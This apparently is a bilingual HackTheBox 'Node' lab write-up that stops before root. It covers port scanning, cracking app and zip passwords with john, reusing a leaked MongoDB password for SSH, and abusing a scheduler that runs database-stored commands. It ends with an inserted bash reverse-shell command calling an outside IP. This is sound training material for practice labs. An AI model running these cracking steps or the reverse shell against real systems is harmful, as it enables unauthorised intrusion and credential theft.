0%

HackTheBox-Node

node

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PORT     STATE SERVICE
22/tcp open ssh
3000/tcp open ppp

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port:3000

20210415-15:53:37-_QKxP2d_QKxP2d_QKxP2d_eER9Cj

Online Crack Password

myP14ceAdm1nAcc0uNT:manchester

tom:spongebob

mark:snowflake

rastating:NO RESULT

only the myP14ceAdm1nAcc0uNT is admin.

只有myP14ceAdm1nAcc0uNT是管理员

when i login myP14ceAdm1nAcc0uNT, i get this file.

20210415-15:58:28-_mgyXeE_mgyXeE_mgyXeE_kZ4mZE

download it。

and then.

下载之后,直接cat看不出什么眉头,但是如果用base64 -d解码后输出到一个文件里,再去看他的文件类型。是zip。

1
2
3
4
cat myplace.backup.gz|base64 -d > a
file a
a: Zip archive data, at least v1.0 to extract
mv a myplace.backup.zip

so is a zip archive, but it’s password protected.but we can try to use zip2john to get the password hash to pass to john to crack.

不过有密码保护,但是可以使用zip2john来获得密码hash,给到john破解。

1
2
3
4
5
6
7
8
9
10
11
zip2john myplace.backup.zip >myplace.backup.zip.hash
john myplace.backup.zip.hash --wodlist=/opt/useful/Seclists/Passwords/Leaked-Databases/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (myplace.backup.zip)
1g 0:00:00:00 DONE (2021-04-15 08:10) 33.33g/s 6280Kp/s 6280Kc/s 6280KC/s sandrad..becky101
Use the "--show" option to display all of the cracked passwords reliably
Session completed

After unpacking the file, you can see the web backupfile

解压之后,可以看到网站的备份文件。

1
2
3
4
5
└──╼ #cat app.js

const ......................
const url = 'mongodb://mark:[email protected]:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

the databses is mongodb,and the user is mark passwordis 5AYRft73VtFpc84k.we could use this password to try to log in to ssh.

app.js里面的开头有配置数据库连接账号密码。可以拿来试试登陆ssh。

1
2
3
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
[email protected]:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)

After enumerating the system, we will find the files /usr/local/bin/backup and /var/scheduler/app.js.

/usr/local/bin/backup this file will be executed when we visit http[:/]/node.htb/admin/backup.

Another file /var/scheduler/app.js is found with ps -ef and is also run by the user tom. Also tom belongs to the admin group, so I guess we need to get the tom user.

枚举系统后,我们会发现/usr/local/bin/backup和/var/scheduler/app.js这两个文件。

/usr/local/bin/backup这个文件将在我们访问http[:/]/node.htb/admin/backup时执行。

另一个文件/var/scheduler/app.js是用ps -ef找到的,也是由用户tom运行的。另外tom属于管理员组,所以我想我们需要获取tom用户。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
[email protected]:/tmp$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:[email protected]:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}

setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);

});

look at this file,it clear reveal the scheduler databases and the file looks like could execute command.

看这个文件连接了scheduler数据库,看起来是个排程,可以执行数据库tasks集合cmd字段里面的命令。

1
2
3
4
5
6
mongo --port 27017 -u "mark" -p "5AYRft73VtFpc84k"   "scheduler"

db.tasks.find()
#db.tasks.insert({cmd:"touch /tmp/test"}) test

db.tasks.insert({cmd:"bash -c 'bash -i >&/dev/tcp/10.10.16.69/1234 0>&1'"})

20210415-17:28:14-_K4qOn1_K4qOn1_K4qOn1_OYOWmp

提权至root

后面不会了。。先留着。

Keep it first. Challenge again later。